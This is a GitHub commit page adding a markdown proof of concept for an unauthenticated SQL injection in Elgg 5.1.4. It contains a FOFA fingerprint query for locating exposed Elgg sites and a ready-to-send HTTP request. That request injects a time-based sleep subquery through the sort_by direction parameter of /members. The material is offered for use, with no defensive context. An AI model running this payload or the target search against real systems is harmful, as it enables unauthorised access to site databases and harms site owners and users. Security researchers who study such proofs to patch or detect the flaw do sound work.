Skip to content

Commit

Permalink
Merge pull request #15 from Kazgangap/elgg
Browse files Browse the repository at this point in the history 
Elgg sqli poc
  • Loading branch information
@wy876
wy876 authored Aug 22, 2024
2 parents 83965d3 + ae80b9d commit dccd39d
Showing 1 changed file with 14 additions and 0 deletions.
14 changes: 14 additions & 0 deletions Elgg/elgg-sqli.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
## Elgg 5.1.4 Sql Injection

## fofa
```
icon_hash="413602919"
```
## poc
```
GET /members?sort_by%5Bproperty%5D=name&sort_by%5Bproperty_type%5D=metadata&sort_by%5Bdirection%5D=desc%2c(select*from(select(sleep(6)))a) HTTP/1.1
Host:
```

## Ref
- https://github.com/4rdr/proofs/blob/main/info/Elgg_unauth_SQLi_5.1.4.md

0 comments on commit dccd39d

Please sign in to comment.